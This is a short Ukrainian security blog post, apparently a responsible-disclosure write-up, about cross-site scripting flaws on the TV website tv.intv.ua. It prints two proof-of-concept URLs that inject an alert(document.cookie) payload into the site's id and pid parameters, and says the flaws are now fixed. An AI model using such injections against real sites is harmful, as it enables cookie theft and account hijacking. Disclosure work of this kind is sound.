Уразливості на tv.intv.ua
17:10 28.01.201226.06.2009
Сьогодні я знайшов Cross-Site Scripting уразливості на сайті http://tv.intv.ua (це новий домен проекту http://intv-inter.net, при цьому сайт використовує обидва домени). Про що найближчим часом сповіщу адміністрацію сайта.
Раніше я вже писав про уразливості на intv-inter.net.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
28.01.2012
XSS (в IE при кліку на “Додати в обране”):
http://tv.intv.ua/tv/channel/intv/?id=570507&pid=823');alert(document.cookie);//
http://tv.intv.ua/tv/channel/intv/?id=570507');alert(document.cookie);//
Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).